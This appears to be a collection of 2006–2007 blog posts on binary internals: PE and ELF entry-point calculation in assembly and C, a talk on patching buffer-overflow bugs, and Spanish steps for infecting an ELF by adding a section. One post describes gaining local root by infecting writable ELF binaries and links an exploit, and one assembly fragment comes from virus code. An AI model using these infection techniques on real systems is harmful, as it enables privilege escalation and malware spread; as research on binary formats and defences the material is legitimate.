http://radare.nopcode.org/wiki/

PE entry calculation

2007-08-22T22:52:00.000+02:00

The way to calculate win32 PE entry point offset is similar than linux elf's.

We have to keep in mind 3 basic concepts:

RVA -> adress relative to the beginning of de loaded PE at runtime.
(can be relative to something, is like an offset, but often is referred to a running process)
VA -> Is an absolute memory address in the loaded binary at runtime.
offset -> Is a relative address, like RVA but is relative from the beginning of the file.

Wen a binary is executed, the loader maps some parts and do some relocations, the memory map of the binary at runtime is diferent than the file image. If we map the file, we speak of offsets from the beginnig of the map/file.

Example:

Entry RVA: 12475h
PE Imagebase: 100000h

Ok, when the PE is loaded, the entry is at 112475h, easy :)
but, we have maped the file image, and we wish to know the entry's offset.

Sections has 3 important values: RVA of the section, Size of the section and offset.

We know de entry's RVA, we can check with the sections RVA in order to see where is the entry.

When we get the section RVA, becouse of we hav the sections offset, we can get the Delta between his RVA and offset, if we apply this delta to the RVA we will get the entry's offset, then we have to add the beginning of the map and will have our entry.

;We have maped the file, and eax is pointing to the beginning of the file.

entryCalculation:
   mov edx, [eax+3Ch]       ; edx -> RVA of File Header
   add edx, eax          ; edx -> VA of File Header
   mov esi, [edx+28h]       ; esi -> RVA of entry point

   lea edi, [edx+74h]       ; edi -> ptr to the beginning of section table
   mov ecx, [edx+2]       ; ecx -> number of sections
seekEntrySection:
   mov ebx, [edi+0Ch]       ; ebx -> RVA of section
   mov edx, ebx
   add edx, [edi+8]       ; edx -> rva of the end of the section

   cmp esi, ebx    ; entryRVA < sectionRVA => wrong
   jl wrongEntry

   cmp esi, edx ; entryRVA > sectionRVA + sectionSize => nextSection
   jg nextSection ; entry is out of bounds of this section, check next section.

   sub esi, ebx       ; entry calculus
   add esi, [edi+10h]
   jmp gotEntry

nextSection:
   add edi, [edi+8]   ; nextSection=currentSection+currentSection Size
   loop seekEntrySection

wrongEntry:
...

gotEntry:
...

Get local root by infection

2006-10-09T15:54:00.000+02:00

I presented at the Barcelona FIST conference a new way to local-hack linux box by infecting ELF executables.

It's possible do an elf-infection to a writable binary, and wait that r00t or a priviledged user executes it, is a simple idea but a complex implementation.

Here is my presentation:
http://www.fistconference.org/data/presentaciones/infR3.pdf

And here is my implementation:
http://www.milw0rm.com/author/300
http://www.badchecksum.com/code/pentest/infR3.s

Here is a demo:http://www.youterm.com/?view=Player&video=hack/infector
or
echo hack/infector/exit | nc youterm.com 9999

Elf entry calculation in c

2006-10-04T23:42:00.000+02:00

e_entry points to the virtual address where will be _start at runtime.
In order to calculate the relative virtual address of the entry point from the beginning of the file image, we should look for the code segment and use this formula:

(elf).e_entry - (code).p_vaddr + (code).p_offset

p_offset is the distance from the begining of the file to the code segment.
p_addr is the virtual address of the code segment.

The diference e_entry - p_vaddr can be drawed like this:

(at runtime)
+--- code segment ---- <- p_vaddr
|
|
|
|<---- e_entry
|
We already know the distance inside the code segment where is the entry point (usually at the begining of .text section) If now we sum the offset where code segment starts from the beginning, we will have the offset from the beginning of the file where is exactly the entry point.

void getentry (struct map *elf) {
int ph;
int s; //text section Index text
elf->text.s = elf->s;

for (s=0; se->e_shnum; s++) {

  if (strcmp(".text",(char *)((unsigned long)elf->e + (unsigned    long)elf->strtab->sh_offset + (unsigned long)elf->text.s->sh_name))    == 0)
   break;

  elf->text.s++;
}

if (elf->e->e_shnum == s) {
  printf(".text section can not be found, bad elf\n");
  final();
}

//elf->p Is the first record, elf->text.p This ptr will be travelling throw the memory since arrive to the text segment
elf->text.p = elf->p;

for (ph=elf->e->e_phnum; ph>0; ph--) {

  if (elf->text.p->p_type == PT_LOAD && elf->text.p->p_flags == 5) {
   elf->text.size = elf->text.p->p_memsz;
   elf->text.entry.rel = (unsigned long)((unsigned long)elf->e->e_entry -
(unsigned long)elf->text.p->p_vaddr +
(unsigned long)elf->text.p->p_offset);
   elf->text.entry.abs = elf->text.entry.rel + (unsigned long)elf->e;

/*
We have 4 entry points
* elf->e->e_entry (VA of the entry at runtime)
* elf->text.entry.rel (RVA of the entry from the beginning of .text)
* elf->text.entry.abs (VA of the entry from the beginning of the file)
*/

   return;
  }
  elf->text.p++;
}

printf("There is no entry point\n");
final();
}

// EOF

Elf entry calculation in asm

2006-10-04T23:31:00.000+02:00

There are two ways to access to the elf fields, directly knowing the offset of the field needed or filling a small structure and then access to the structure field.

main:
...
end:
e_ident:
.long 0
.long 0
.long 0
.long 0
e_type:
.int 0
e_machine:
.int 0
e_version:
.long 0
e_entry:

(structure in at&t format)

ELF struct
  e_ident      dd 4 dup(?)
  e_type       dw ?
  e_machine dw ?
  e_version dw ?
  e_entry     dd ?
ELF ends

(structure in intel format)

Using a structure is the easy way it only needs a open() and read() syscalls.
But wen some file-image accesses are nedded, is not the best way to make some reads. Is better to map the file and work with pointers.

store_init:
movl $end_vir, %ecx
subl $start_vir, %ecx
movl %ecx,-16(%ebp) # -16 -> size of virus + 5

leal -500(%ebp), %edi # edi -> -500
movl 0x18(%eax), %esi # esi -> RVA e_entry
movl 0x2c(%eax), %ecx # Numero de PH's (e_phnum) (back-count)

first_ph:
movl 0x1c(%eax), %edx # edx -> RVA e_phoff
addl %eax, %edx # edx -> VA e_phoff

seek_ph:
cmpl %esi, 0x08(%edx) # if e_entry > p_vaddr => next ProgramHeader
jna destiny

next_ph:
addl 0x2a(%edx), %edx
loop seek_ph

destiny: ######### THE MAIN KEY ##########
subl 0x08(%edx), %esi # esi -> RVA e_entry-p_vaddr
addl 0x04(%edx), %esi # esi -> RVA e_entry-p_vaddr+p_offset
addl %eax, %esi # esi -> VA e_entry-p_vaddr+p_offset
movl %esi, %edx

#EOF

Elf infection adding new section

2006-10-04T21:09:00.000+02:00

The No cON Name 2006 security congress celebrated at Palma de Mallorca, i have presented a possible solution to code vulnerabilities like buffer overflows.

Here is the link: http://www.noconname.org/congreso2006.php

I prensented some current solutions like pax, W^X, address layout randomizations, etc and show their main limitation: doesnt solve the real problem, when overflow happens, there are many traps to prevent the execution of code but the overflow happened yet and with time, attackers will redirect execution and will inject a payload somewhere.

I have shown the real problem: at post-compilation there are no variable-sizes, only exists pointers to the beginning of variables but not the end either the size.

Is it possible to calculate the limits of almost all variables, by reading dinamyc memory calls, and analyzing the use of the stack pointers.

I proposed the idea of a binary regenerator, that study the pointer bounds, and correct the instructions that want to violate this boundaries. In order to repair the code i show some virus infection, cold-patching and hot patchin techiniques.

Instead of replacing code by inline-patching, i suggested to make a call a .regen section and there is the code sanitizeed, in order to recover the bad-code if needed.

Why current protections are dificulting the explotation instead of solve the problem?
May the compilers store the variable sizes at de elf and PE executables?

I think this will solve most of security problems.

[spanish]
En el congreso 2006 de seguridad informática celebrado en palma de mallorca (noconname.org) he presentado una solución a los problemas de desbordamientos de pila, basandose en localizar límites y parchear el código vulnerable.

El parcheo o infección de código lo realizan los virus informáticos, podemos aplicar muchas partes de ellos en la seguridad.

De los diversos tipos de infección que hay (overlay, crecimiento de .text, seccion nueva, etc ..) hablaré de una en concreta que para este caso es más eficaz.

El objetivo es poder corregir el código binario y dejar el código corregido en otra seccion (.patch)

Infección mediante creación de sección:
(en este procedimiento no se va a agrandar shstrtab para incluir ahi el nombre de sección ya que la sección que contiene nombre de secciones no es mapeada en tiempo de ejecución)

1. Remapear con el tamaño del fichero+parche+1 registro de sección
2. Desplazamiento lógico del offset y virtual de las secciones inferiores a la tabla de secciones
3. Desplazamiento físico de las secciones inferiores a la tabla de secciones
4. Añadir nueva sección semejante a .text con flags progbits, alocatable y ejecutable. Y aumentar e_shnum
5. Agrandamiento lógico de segmento de texto en el tamaño del parche
6. Desplazamiento lógico de los segmentos inferiores al de texto (offset y virtual)
7. Desplazamiento lógico de las secciones inferiores al antiguo final del segmento de texto (offset y virtual)
8. Desplazar físicamente lo que haga por debajo del inicio de .patch (final del antiguo segmento texto) para que quede espacio para .patch
9. Actualizar e_shoff ya que se ha desplazado físicamente la tabla de secciones (está abajo)
10. Guardar la nueva versión corregida de las funciones vulnerables en .patch y reapuntar sus calls a esta sección.

EOF